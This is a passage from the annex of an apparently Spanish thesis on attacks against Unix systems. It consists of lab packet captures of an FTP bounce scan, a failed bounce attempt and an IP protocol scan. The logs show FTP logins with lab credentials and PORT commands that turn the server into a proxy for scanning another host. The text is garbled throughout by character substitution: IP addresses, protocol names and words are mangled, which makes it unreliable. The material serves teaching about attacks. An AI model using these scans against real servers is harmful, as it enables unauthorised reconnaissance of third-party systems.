nro. 55 - Tiempo 0.9(55(1 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.( -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:1((00 Brag:02 TT2:+5 9...: T,P ?ea7er: .Port:+6173 DPort:)0 .eqN:()7007+(9( #!6N:397)13361+ B"ag :0D1(9.#: &n7:(0+) 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+6173 > 19(.16).0.30:>>> .# Paquete nro. 56 - Tiempo 0.9(61(5 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:17:31:96:5b:1f 8P Origen: 19(.16).0.30 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 2en:+0 8D:99 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6173 .eqN:397)13361+ #!6N:0 B"ag :0D0+9$: &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+6173 $

B.2.*.. Ca"tura *-% FF! Bounce ,can
Paquete Nro: 1 - Tiempo: 0.000000 8P Origen: 00:17:31:96:5b:1f: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.100* Te"" 19(.16).0.( Paquete Nro: ( - Tiempo: 0.000(7( 8P Origen: 00:0!:(9:90:(a:(7: -> 8P De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.100 i at 00:0!:(9:90:(a:(7 Paquete Nro: 3 - Tiempo: 0.0(3651

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *5* de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
8P Origen: 19(.16).0.(:3+691 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: T,P De !rip!i%n: 3+691 > (1 -./N0 .eq10 2en10 3..11+60 T.=16((5)30 T.<$10 &.17 Paquete Nro: + - Tiempo: 0.0(3931 8P Origen: 19(.16).0.30:(1 -> 8P De tino: 19(.16).0.(:3+691 Proto!o"o: T,P De !rip!i%n: (1 > 3+691 -./N4 #,50 .eq10 #!611 &in15(+()0 2en10 3..11+60 &.13 T.=1()6910)939 T.<$16((5)30 Paquete Nro: 5 - Tiempo: 0.0(395) 8P Origen: 19(.16).0.(:3+691 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: T,P De !rip!i%n: 3+691 > (1 -#,50 .eq11 #!611 &in15))) 2en10 T.=16((5)30 T.<$1()6910)939 Paquete Nro: 6 - Tiempo: 0.0(650) 8P Origen: 19(.16).0.30:61906 -> 8P De tino: 19(.16).0.1:53 Proto!o"o: DN. De !rip!i%n: .tan7ar7 querE PT$ (.0.16).19(.in-a77r.arpa Paquete Nro: 7 - Tiempo: 0.0(65(1 8P Origen: 19(.16).0.30:61906 -> 8P De tino: 19(.16).0.1:53 Proto!o"o: DN. De !rip!i%n: .tan7ar7 querE PT$ (.0.16).19(.in-a77r.arpa Paquete Nro: ) - Tiempo: 0.0536)( 8P Origen: 19(.16).0.1:53 -> 8P De tino: 19(.16).0.30:61906 Proto!o"o: DN. De !rip!i%n: .tan7ar7 querE re pon e4 No u!' name Paquete Nro: 9 - Tiempo: 0.05+790 8P Origen: 19(.16).0.30:(1 -> 8P De tino: 19(.16).0.(:3+691 Proto!o"o: BTP De !rip!i%n: $e pon e: ((0 !i!"on BTP er@er 9=er ion 6.002.: rea7E. Paquete Nro: 10 - Tiempo: 0.05+)(7 8P Origen: 19(.16).0.(:3+691 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: T,P De !rip!i%n: 3+691 > (1 -#,50 .eq11 #!61+) &in15))) 2en10 T.=16((5)3) T.<$1()6910)973 Paquete Nro: 11 - Tiempo: (.3)6(5+ 8P Origen: 19(.16).0.(:5(067 -> 8P De tino: 7(.1+.(53.1(5:5((( Proto!o"o: T,P De !rip!i%n: 5(067 > 5((( -#,50 .eq10 #!610 &in163000 2en10 Paquete Nro: 1( - Tiempo: 7.056617 8P Origen: 19(.16).0.(:3+691 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: BTP De !rip!i%n: $eque t: K.<$ mar!e"o Paquete Nro: 13 - Tiempo: 7.05)177 8P Origen: 19(.16).0.30:(1 -> 8P De tino: 19(.16).0.(:3+691 Proto!o"o: BTP De !rip!i%n: $e pon e: 331 Pa >or7 require7 for mar!e"o. Paquete Nro: 1+ - Tiempo: 7.05)(16 8P Origen: 19(.16).0.(:3+691 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: T,P De !rip!i%n: 3+691 > (1 -#,50 .eq115 #!61)+ &in15))) 2en10 T.=16((75)9 T.<$1()6911579( Paquete Nro: 15 - Tiempo: 7.05)501 8P Origen: 19(.16).0.(:3+691 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: BTP De !rip!i%n: $eque t: P#.. mar!epa Paquete Nro: 16 - Tiempo: 7.091067 8P Origen: 19(.16).0.30:56756 -> 8P De tino: 19(.16).0.1:53 Proto!o"o: DN. De !rip!i%n: .tan7ar7 querE PT$ (.0.16).19(.in-a77r.arpa

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *52 de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
Paquete Nro: 17 - Tiempo: 7.0910)( 8P Origen: 19(.16).0.30:56756 -> 8P De tino: 19(.16).0.1:53 Proto!o"o: DN. De !rip!i%n: .tan7ar7 querE PT$ (.0.16).19(.in-a77r.arpa Paquete Nro: 1) - Tiempo: 7.1157(1 8P Origen: 19(.16).0.1:53 -> 8P De tino: 19(.16).0.30:56756 Proto!o"o: DN. De !rip!i%n: .tan7ar7 querE re pon e4 No u!' name Paquete Nro: 19 - Tiempo: 7.116330 8P Origen: 19(.16).0.30:(1 -> 8P De tino: 19(.16).0.(:3+691 Proto!o"o: BTP De !rip!i%n: $e pon e: (30 K er mar!e"o "ogge7 in. Paquete Nro: (0 - Tiempo: 7.156+)7 8P Origen: 19(.16).0.(:3+691 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: T,P De !rip!i%n: 3+691 > (1 -#,50 .eq131 #!61113 &in15))) 2en10 T.=16((7613 T.<$1()69115)3( Paquete Nro: (1 - Tiempo: 9.116513 8P Origen: 19(.16).0.(:3+691 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: BTP De !rip!i%n: $eque t: PO$T 19(416)404100404(( Paquete Nro: (( - Tiempo: 9.116990 8P Origen: 19(.16).0.30:(1 -> 8P De tino: 19(.16).0.(:3+691 Proto!o"o: BTP De !rip!i%n: $e pon e: (00 PO$T !omman7 u!!e fu". Paquete Nro: (3 - Tiempo: 9.1170(0 8P Origen: 19(.16).0.(:3+691 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: T,P De !rip!i%n: 3+691 > (1 -#,50 .eq156 #!611+3 &in15))) 2en10 T.=16(()103 T.<$1()69117)0) Paquete Nro: (+ - Tiempo: 9.1(0+70 8P Origen: 19(.16).0.(:3+691 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: BTP De !rip!i%n: $eque t: 28.T Paquete Nro: (5 - Tiempo: 9.1((+91 8P Origen: 19(.16).0.30:(0 -> 8P De tino: 19(.16).0.100:(( Proto!o"o: T,P De !rip!i%n: (0 > (( -./N0 .eq10 2en10 3..11+60 &.13 T.=13031(093 T.<$10 Paquete Nro: (6 - Tiempo: 9.1((50+ 8P Origen: 19(.16).0.30:(0 -> 8P De tino: 19(.16).0.100:(( Proto!o"o: T,P De !rip!i%n: (0 > (( -./N0 .eq10 2en10 3..11+60 &.13 T.=13031(093 T.<$10 Paquete Nro: (7 - Tiempo: 9.1(671+ 8P Origen: 19(.16).0.100:(( -> 8P De tino: 19(.16).0.30:(0 Proto!o"o: T,P De !rip!i%n: (( > (0 -$.T4 #,50 .eq10 #!611 &in10 2en10 Paquete Nro: () - Tiempo: 9.1(67(5 8P Origen: 19(.16).0.100:(( -> 8P De tino: 19(.16).0.30:(0 Proto!o"o: T,P De !rip!i%n: (( > (0 -$.T4 #,50 .eq10 #!611 &in10 2en10 Paquete Nro: (9 - Tiempo: 9.16601( 8P Origen: 19(.16).0.30:(1 -> 8P De tino: 19(.16).0.(:3+691 Proto!o"o: BTP De !rip!i%n: $e pon e: +(5 ,anJt bui"7 7ata !onne!tion: ,onne!tion refu e7. Paquete Nro: 30 - Tiempo: 9.166(95 8P Origen: 19(.16).0.(:3+691 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: BTP De !rip!i%n: $eque t: PO$T 19(416)404100404)0 Paquete Nro: 31 - Tiempo: 9.1666(1

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *5- de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
8P Origen: 19(.16).0.30:(1 -> 8P De tino: 19(.16).0.(:3+691 Proto!o"o: BTP De !rip!i%n: $e pon e: (00 PO$T !omman7 u!!e fu". Paquete Nro: 3( - Tiempo: 9.166765 8P Origen: 19(.16).0.(:3+691 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: BTP De !rip!i%n: $eque t: 28.T Paquete Nro: 33 - Tiempo: 9.16)))1 8P Origen: 19(.16).0.30:(0 -> 8P De tino: 19(.16).0.100:)0 Proto!o"o: T,P De !rip!i%n: (0 > )0 -./N0 .eq10 2en10 3..11+60 &.13 T.=13031(117 T.<$10 Paquete Nro: 3+ - Tiempo: 9.16))93 8P Origen: 19(.16).0.30:(0 -> 8P De tino: 19(.16).0.100:)0 Proto!o"o: T,P De !rip!i%n: (0 > )0 -./N0 .eq10 2en10 3..11+60 &.13 T.=13031(117 T.<$10 Paquete Nro: 35 - Tiempo: 9.17(133 8P Origen: 19(.16).0.100:)0 -> 8P De tino: 19(.16).0.30:(0 Proto!o"o: T,P De !rip!i%n: )0 > (0 -./N4 #,50 .eq10 #!611 &in130660 2en10 3..11+60 T.=1+61953( T.<$13031(117 &.10 Paquete Nro: 36 - Tiempo: 9.17(1+5 8P Origen: 19(.16).0.100:)0 -> 8P De tino: 19(.16).0.30:(0 Proto!o"o: T,P De !rip!i%n: )0 > (0 -./N4 #,50 .eq10 #!611 &in130660 2en10 3..11+60 T.=1+61953( T.<$13031(117 &.10 Paquete Nro: 37 - Tiempo: 9.17+05) 8P Origen: 19(.16).0.30:(0 -> 8P De tino: 19(.16).0.100:)0 Proto!o"o: T,P De !rip!i%n: (0 > )0 -#,50 .eq11 #!611 &in16660) 2en10 T.=13031(13+ T.<$1+61953( Paquete Nro: 3) - Tiempo: 9.17+071 8P Origen: 19(.16).0.30:(0 -> 8P De tino: 19(.16).0.100:)0 Proto!o"o: T,P De !rip!i%n: -T,P Dup #,5 37N10 (0 > )0 -#,50 .eq11 #!611 &in16660) 2en10 T.=13031(13+ T.<$1+61953( Paquete Nro: 39 - Tiempo: 9.17+09+ 8P Origen: 19(.16).0.30:(1 -> 8P De tino: 19(.16).0.(:3+691 Proto!o"o: BTP De !rip!i%n: $e pon e: 150 Opening #.,88 mo7e 7ata !onne!tion for J;bin;" J. Paquete Nro: +0 - Tiempo: 9.175116 8P Origen: 19(.16).0.30:(1 -> 8P De tino: 19(.16).0.(:3+691 Proto!o"o: BTP De !rip!i%n: $e pon e: ((6 Tran fer !omp"ete. Paquete Nro: +1 - Tiempo: 9.17513( 8P Origen: 19(.16).0.30:(0 -> 8P De tino: 19(.16).0.100:)0 Proto!o"o: BTP-D#T# De !rip!i%n: BTP Data: 5+5 bEte Paquete Nro: +( - Tiempo: 9.175136 8P Origen: 19(.16).0.30:(0 -> 8P De tino: 19(.16).0.100:)0 Proto!o"o: BTP-D#T# De !rip!i%n: -T,P Out-Of-Or7er0 BTP Data: 5+5 bEte Paquete Nro: +3 - Tiempo: 9.175605 8P Origen: 19(.16).0.100:)0 -> 8P De tino: 19(.16).0.30:(0 Proto!o"o: T,P De !rip!i%n: )0 > (0 -#,50 .eq11 #!615+7 &in130660 2en10 T.=1+619533 T.<$13031(135 Paquete Nro: ++ - Tiempo: 9.175611 8P Origen: 19(.16).0.100:)0 -> 8P De tino: 19(.16).0.30:(0 Proto!o"o: T,P De !rip!i%n: -T,P Dup #,5 +3N10 )0 > (0 -#,50 .eq11 #!615+7 &in130660 2en10 T.=1+619533 T.<$13031(135

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *51 de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
Paquete Nro: +5 - Tiempo: 9.175)93 8P Origen: 19(.16).0.100:)0 -> 8P De tino: 19(.16).0.30:(0 Proto!o"o: BTP-D#T# De !rip!i%n: BTP Data: 315 bEte Paquete Nro: +6 - Tiempo: 9.175)9) 8P Origen: 19(.16).0.100:)0 -> 8P De tino: 19(.16).0.30:(0 Proto!o"o: BTP-D#T# De !rip!i%n: -T,P Out-Of-Or7er0 BTP Data: 315 bEte Paquete Nro: +7 - Tiempo: 9.175991 8P Origen: 19(.16).0.100:)0 -> 8P De tino: 19(.16).0.30:(0 Proto!o"o: T,P De !rip!i%n: )0 > (0 -B8N4 #,50 .eq1316 #!615+7 &in131)56 2en10 T.=1+619533 T.<$13031(135 Paquete Nro: +) - Tiempo: 9.175995 8P Origen: 19(.16).0.100:)0 -> 8P De tino: 19(.16).0.30:(0 Proto!o"o: T,P De !rip!i%n: )0 > (0 -B8N4 #,50 .eq1316 #!615+7 &in131)56 2en10 T.=1+619533 T.<$13031(135 Paquete Nro: +9 - Tiempo: 9.176(97 8P Origen: 19(.16).0.(:3+691 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: T,P De !rip!i%n: 3+691 > (1 -#,50 .eq193 #!61306 &in15))) 2en10 T.=16(()11) T.<$1()69117)55 Paquete Nro: 50 - Tiempo: 9.176)+5 8P Origen: 19(.16).0.30:(0 -> 8P De tino: 19(.16).0.100:)0 Proto!o"o: T,P De !rip!i%n: (0 > )0 -$.T0 .eq15+7 2en10 Paquete Nro: 51 - Tiempo: 9.176)5( 8P Origen: 19(.16).0.30:(0 -> 8P De tino: 19(.16).0.100:)0 Proto!o"o: T,P De !rip!i%n: (0 > )0 -$.T0 .eq15+7 2en10 Paquete Nro: 5( - Tiempo: 9.176)66 8P Origen: 19(.16).0.30:(0 -> 8P De tino: 19(.16).0.100:)0 Proto!o"o: T,P De !rip!i%n: (0 > )0 -$.T0 .eq15+7 2en10 Paquete Nro: 53 - Tiempo: 9.176)70 8P Origen: 19(.16).0.30:(0 -> 8P De tino: 19(.16).0.100:)0 Proto!o"o: T,P De !rip!i%n: (0 > )0 -$.T0 .eq15+7 2en10 Paquete Nro: 5+ - Tiempo: 1(.3)7175 8P Origen: (16.155.193.160:5050 -> 8P De tino: 19(.16).0.(:+0319 Proto!o"o: T,P De !rip!i%n: 5050 > +0319 -#,50 .eq10 #!610 &in13331( 2en10 T.=1)(539313) T.<$16(())+5 Paquete Nro: 55 - Tiempo: 13.0)+(3( 8P Origen: 19(.16).0.(:+79)( -> 8P De tino: 6+.1(.(5.):5190 Proto!o"o: #83 De !rip!i%n: 5eep #"i@e Paquete Nro: 56 - Tiempo: 13.(51165 8P Origen: 6+.1(.(5.):5190 -> 8P De tino: 19(.16).0.(:+79)( Proto!o"o: T,P De !rip!i%n: 5190 > +79)( -#,50 .eq10 #!616 &in1163)+ 2en10 Paquete Nro: 57 - Tiempo: 1+.+16)7( 8P Origen: 19(.16).0.(:3+691 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: T,P De !rip!i%n: 3+691 > (1 -B8N4 #,50 .eq193 #!61306 &in15))) 2en10 T.=16((9+() T.<$1()69117)55 Paquete Nro: 5) - Tiempo: 1+.+17()3 8P Origen: 19(.16).0.30:(1 -> 8P De tino: 19(.16).0.(:3+691 Proto!o"o: T,P

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *55 de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
De !rip!i%n: (1 > 3+691 -#,50 .eq1306 #!619+ &in16660) 2en10 T.=1()691(()+5 T.<$16((9+() Paquete Nro: 59 - Tiempo: 1+.+173(5 8P Origen: 19(.16).0.30:(1 -> 8P De tino: 19(.16).0.(:3+691 Proto!o"o: BTP De !rip!i%n: $e pon e: ((1 /ou !ou"7 at "ea t aE goo7bEe. Paquete Nro: 60 - Tiempo: 1+.+17339 8P Origen: 19(.16).0.(:3+691 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: T,P De !rip!i%n: 3+691 > (1 -$.T0 .eq19+ 2en10

B.2.**. Ca"tura *1% FF! Bounce Err8neo
Paquete Nro: 1 - Tiempo: 0.000000 8P Origen: 19(.16).0.(:5+(50 -> 8P De tino: 19(.16).0.60:(1 Proto!o"o: T,P De !rip!i%n: 5+(50 > (1 -./N0 .eq10 &in15)+0 2en10 3..11+60 T.=1+9(05(3 T.<$10 &.17 Paquete Nro: ( - Tiempo: 0.000333 8P Origen: 19(.16).0.60:(1 -> 8P De tino: 19(.16).0.(:5+(50 Proto!o"o: T,P De !rip!i%n: (1 > 5+(50 -./N4 #,50 .eq10 #!611 &in1579( 2en10 3..11+60 T.=1173971 T.<$1+9(05(3 &.1( Paquete Nro: 3 - Tiempo: 0.000367 8P Origen: 19(.16).0.(:5+(50 -> 8P De tino: 19(.16).0.60:(1 Proto!o"o: T,P De !rip!i%n: 5+(50 > (1 -#,50 .eq11 #!611 &in15))) 2en10 T.=1+9(05(3 T.<$1173971 Paquete Nro: + - Tiempo: 0.011+)6 8P Origen: 19(.16).0.60:(1 -> 8P De tino: 19(.16).0.(:5+(50 Proto!o"o: BTP De !rip!i%n: $e pon e: ((0 9@ BTP7 (.0.+: Paquete Nro: 5 - Tiempo: 0.011530 8P Origen: 19(.16).0.(:5+(50 -> 8P De tino: 19(.16).0.60:(1 Proto!o"o: T,P De !rip!i%n: 5+(50 > (1 -#,50 .eq11 #!61(1 &in15))) 2en10 T.=1+9(05(6 T.<$117397+ Paquete Nro: 6 - Tiempo: 7.0(1(03 8P Origen: 19(.16).0.(:5+(50 -> 8P De tino: 19(.16).0.60:(1 Proto!o"o: BTP De !rip!i%n: $eque t: K.<$ anonEmou Paquete Nro: 7 - Tiempo: 7.0(1391 8P Origen: 19(.16).0.60:(1 -> 8P De tino: 19(.16).0.(:5+(50 Proto!o"o: T,P De !rip!i%n: (1 > 5+(50 -#,50 .eq1(1 #!6117 &in1579( 2en10 T.=1175(3( T.<$1+9(((7) Paquete Nro: ) - Tiempo: 7.0(163) 8P Origen: 19(.16).0.60:(1 -> 8P De tino: 19(.16).0.(:5+(50 Proto!o"o: BTP De !rip!i%n: $e pon e: 331 P"ea e pe!ifE t'e pa >or7. Paquete Nro: 9 - Tiempo: 7.0(1650 8P Origen: 19(.16).0.(:5+(50 -> 8P De tino: 19(.16).0.60:(1 Proto!o"o: T,P De !rip!i%n: 5+(50 > (1 -#,50 .eq117 #!6155 &in15))) 2en10 T.=1+9(((7) T.<$1175(33 Paquete Nro: 10 - Tiempo: 7.0((+31 8P Origen: 19(.16).0.(:5+(50 -> 8P De tino: 19(.16).0.60:(1 Proto!o"o: BTP De !rip!i%n: $eque t: P#.. ->>>u erI Paquete Nro: 11 - Tiempo: 7.03((9+ 8P Origen: 19(.16).0.60:(1 -> 8P De tino: 19(.16).0.(:5+(50 Proto!o"o: BTP De !rip!i%n: $e pon e: (30 2ogin u!!e fu".

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *5J de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
Paquete Nro: 1( - Tiempo: 7.07(957 8P Origen: 19(.16).0.(:5+(50 -> 8P De tino: 19(.16).0.60:(1 Proto!o"o: T,P De !rip!i%n: 5+(50 > (1 -#,50 .eq133 #!617) &in15))) 2en10 T.=1+9(((91 T.<$1175(3+ Paquete Nro: 13 - Tiempo: 9.0+093+ 8P Origen: 19(.16).0.(:5+(50 -> 8P De tino: 19(.16).0.60:(1 Proto!o"o: BTP De !rip!i%n: $eque t: PO$T 19(416)404100404)0 Paquete Nro: 1+ - Tiempo: 9.0+15+5 8P Origen: 19(.16).0.60:(1 -> 8P De tino: 19(.16).0.(:5+(50 Proto!o"o: BTP De !rip!i%n: $e pon e: (00 PO$T !omman7 u!!e fu". ,on i7er u ing P#.=. Paquete Nro: 15 - Tiempo: 9.0+1576 8P Origen: 19(.16).0.(:5+(50 -> 8P De tino: 19(.16).0.60:(1 Proto!o"o: T,P De !rip!i%n: 5+(50 > (1 -#,50 .eq15) #!611(9 &in15))) 2en10 T.=1+9((7)3 T.<$1175596 Paquete Nro: 16 - Tiempo: 9.0+)))5 8P Origen: 19(.16).0.(:5+(50 -> 8P De tino: 19(.16).0.60:(1 Proto!o"o: BTP De !rip!i%n: $eque t: 28.T Paquete Nro: 17 - Tiempo: 9.0+9763 8P Origen: 19(.16).0.60:(0 -> 8P De tino: 19(.16).0.100:)0 Proto!o"o: T,P De !rip!i%n: (0 > )0 -./N0 .eq10 &in15)+0 2en10 3..11+60 T.=1175597 T.<$10 &.1( Paquete Nro: 1) - Tiempo: 9.0+9771 8P Origen: 19(.16).0.60:(0 -> 8P De tino: 19(.16).0.100:)0 Proto!o"o: T,P De !rip!i%n: (0 > )0 -./N0 .eq10 &in15)+0 2en10 3..11+60 T.=1175597 T.<$10 &.1( Paquete Nro: 19 - Tiempo: 9.05006+ 8P Origen: 19(.16).0.100:)0 -> 8P De tino: 19(.16).0.60:(0 Proto!o"o: T,P De !rip!i%n: )0 > (0 -./N4 #,50 .eq10 #!611 &in130660 2en10 3..11+60 T.=1369++7) T.<$1175597 &.10 Paquete Nro: (0 - Tiempo: 9.05006) 8P Origen: 19(.16).0.100:)0 -> 8P De tino: 19(.16).0.60:(0 Proto!o"o: T,P De !rip!i%n: )0 > (0 -./N4 #,50 .eq10 #!611 &in130660 2en10 3..11+60 T.=1369++7) T.<$1175597 &.10 Paquete Nro: (1 - Tiempo: 9.061++1 8P Origen: 19(.16).0.60:(0 -> 8P De tino: 19(.16).0.100:)0 Proto!o"o: T,P De !rip!i%n: (0 > )0 -#,50 .eq11 #!611 &in15)+0 2en10 T.=1175597 T.<$1369++7) Paquete Nro: (( - Tiempo: 9.061+50 8P Origen: 19(.16).0.60:(0 -> 8P De tino: 19(.16).0.100:)0 Proto!o"o: T,P De !rip!i%n: -T,P Dup #,5 (1N10 (0 > )0 -#,50 .eq11 #!611 &in15)+0 2en10 T.=1175597 T.<$1369++7) Paquete Nro: (3 - Tiempo: 9.061699 8P Origen: 19(.16).0.60:(1 -> 8P De tino: 19(.16).0.(:5+(50 Proto!o"o: BTP De !rip!i%n: $e pon e: 150 ?ere !ome t'e 7ire!torE "i ting. Paquete Nro: (+ - Tiempo: 9.061))+ 8P Origen: 19(.16).0.60:(0 -> 8P De tino: 19(.16).0.100:)0 Proto!o"o: T,P De !rip!i%n: (0 > )0 -B8N4 #,50 .eq11 #!611 &in15)+0 2en10 T.=117559) T.<$1369++7) Paquete Nro: (5 - Tiempo: 9.061))) 8P Origen: 19(.16).0.60:(0 -> 8P De tino: 19(.16).0.100:)0 Proto!o"o: T,P

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *5+ de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
De !rip!i%n: (0 > )0 -B8N4 #,50 .eq11 #!611 &in15)+0 2en10 T.=117559) T.<$1369++7) Paquete Nro: (6 - Tiempo: 9.066653 8P Origen: 19(.16).0.100:)0 -> 8P De tino: 19(.16).0.60:(0 Proto!o"o: T,P De !rip!i%n: )0 > (0 -#,50 .eq11 #!61( &in130660 2en10 T.=1369++79 T.<$117559) Paquete Nro: (7 - Tiempo: 9.06666( 8P Origen: 19(.16).0.100:)0 -> 8P De tino: 19(.16).0.60:(0 Proto!o"o: T,P De !rip!i%n: -T,P Dup #,5 (6N10 )0 > (0 -#,50 .eq11 #!61( &in130660 2en10 T.=1369++79 T.<$117559) Paquete Nro: () - Tiempo: 9.0669+1 8P Origen: 19(.16).0.100:)0 -> 8P De tino: 19(.16).0.60:(0 Proto!o"o: T,P De !rip!i%n: )0 > (0 -B8N4 #,50 .eq11 #!61( &in131)56 2en10 T.=1369++79 T.<$117559) Paquete Nro: (9 - Tiempo: 9.0669++ 8P Origen: 19(.16).0.100:)0 -> 8P De tino: 19(.16).0.60:(0 Proto!o"o: T,P De !rip!i%n: )0 > (0 -B8N4 #,50 .eq11 #!61( &in131)56 2en10 T.=1369++79 T.<$117559) Paquete Nro: 30 - Tiempo: 9.06)((0 8P Origen: 19(.16).0.60:(0 -> 8P De tino: 19(.16).0.100:)0 Proto!o"o: T,P De !rip!i%n: (0 > )0 -#,50 .eq1( #!61( &in15)+0 2en10 T.=1175599 T.<$1369++79 Paquete Nro: 31 - Tiempo: 9.06)((9 8P Origen: 19(.16).0.60:(0 -> 8P De tino: 19(.16).0.100:)0 Proto!o"o: T,P De !rip!i%n: -T,P Dup #,5 30N10 (0 > )0 -#,50 .eq1( #!61( &in15)+0 2en10 T.=1175599 T.<$1369++79 Paquete Nro: 3( - Tiempo: 9.06)+11 8P Origen: 19(.16).0.60:(1 -> 8P De tino: 19(.16).0.(:5+(50 Proto!o"o: BTP De !rip!i%n: $e pon e: ((6 Dire!torE en7 O5. Paquete Nro: 33 - Tiempo: 9.069((1 8P Origen: 19(.16).0.(:5+(50 -> 8P De tino: 19(.16).0.60:(1 Proto!o"o: T,P De !rip!i%n: 5+(50 > (1 -#,50 .eq16+ #!6119( &in15))) 2en10 T.=1+9((790 T.<$117559) Paquete Nro: 3+ - Tiempo: 9.069(59 8P Origen: 19(.16).0.(:5+(50 -> 8P De tino: 19(.16).0.60:(1 Proto!o"o: BTP De !rip!i%n: $eque t: PO$T 19(416)4041004+43( Paquete Nro: 35 - Tiempo: 9.069773 8P Origen: 19(.16).0.60:(1 -> 8P De tino: 19(.16).0.(:5+(50 Proto!o"o: BTP De !rip!i%n: $e pon e: (00 PO$T !omman7 u!!e fu". ,on i7er u ing P#.=. Paquete Nro: 36 - Tiempo: 9.070695 8P Origen: 19(.16).0.(:5+(50 -> 8P De tino: 19(.16).0.60:(1 Proto!o"o: BTP De !rip!i%n: $eque t: 28.T Paquete Nro: 37 - Tiempo: 9.07(605 8P Origen: 19(.16).0.60:(0 -> 8P De tino: 19(.16).0.100:1056 Proto!o"o: T,P De !rip!i%n: (0 > 1056 -./N0 .eq10 &in15)+0 2en10 3..11+60 T.=1175600 T.<$10 &.1( Paquete Nro: 3) - Tiempo: 9.07(61+ 8P Origen: 19(.16).0.60:(0 -> 8P De tino: 19(.16).0.100:1056 Proto!o"o: T,P De !rip!i%n: (0 > 1056 -./N0 .eq10 &in15)+0 2en10 3..11+60 T.=1175600 T.<$10 &.1( Paquete Nro: 39 - Tiempo: 9.0731+)

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *5O de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
8P Origen: 19(.16).0.100:1056 -> 8P De tino: 19(.16).0.60:(0 Proto!o"o: T,P De !rip!i%n: 1056 > (0 -$.T4 #,50 .eq11 #!611 &in10 2en10 Paquete Nro: +0 - Tiempo: 9.073155 8P Origen: 19(.16).0.100:1056 -> 8P De tino: 19(.16).0.60:(0 Proto!o"o: T,P De !rip!i%n: 1056 > (0 -$.T4 #,50 .eq11 #!611 &in10 2en10 Paquete Nro: +1 - Tiempo: 9.07+(0) 8P Origen: 19(.16).0.60:(1 -> 8P De tino: 19(.16).0.(:5+(50 Proto!o"o: BTP De !rip!i%n: $e pon e: 150 ?ere !ome t'e 7ire!torE "i ting. Paquete Nro: +( - Tiempo: 9.07+35( 8P Origen: 19(.16).0.60:(1 -> 8P De tino: 19(.16).0.(:5+(50 Proto!o"o: BTP De !rip!i%n: $e pon e: ((6 Dire!torE en7 O5. Paquete Nro: +3 - Tiempo: 9.07+637 8P Origen: 19(.16).0.(:5+(50 -> 8P De tino: 19(.16).0.60:(1 Proto!o"o: T,P De !rip!i%n: 5+(50 > (1 -#,50 .eq195 #!61306 &in15))) 2en10 T.=1+9((791 T.<$1175601 Paquete Nro: ++ - Tiempo: 1+.0731+5 8P Origen: 19(.16).0.(:5+(50 -> 8P De tino: 19(.16).0.60:(1 Proto!o"o: T,P De !rip!i%n: 5+(50 > (1 -B8N4 #,50 .eq195 #!61306 &in15))) 2en10 T.=1+9(+0+1 T.<$1175601 Paquete Nro: +5 - Tiempo: 1+.073639 8P Origen: 19(.16).0.60:(1 -> 8P De tino: 19(.16).0.(:5+(50 Proto!o"o: BTP De !rip!i%n: $e pon e: 500 OOP.: Paquete Nro: +6 - Tiempo: 1+.07367+ 8P Origen: 19(.16).0.(:5+(50 -> 8P De tino: 19(.16).0.60:(1 Proto!o"o: T,P De !rip!i%n: 5+(50 > (1 -$.T0 .eq196 &in10 2en10

B.2.*2. Ca"tura *1B% 7! !rotocol ,can
Paquete nro. 1 - Tiempo 0.000000 8P Origen: ** -> ** 8P ?ea7er: =er ion:** Proto:0D** 9**: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; #$P >'o 'a 19(.16).0.60

aE

19(.16).0.(

Paquete nro. ( - Tiempo 0.000795 8P Origen: ** -> ** 8P ?ea7er: =er ion:** Proto:0D** 9**: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; #$P i at 00:0!:(9:a6:)0:7)

aE

19(.16).0.60

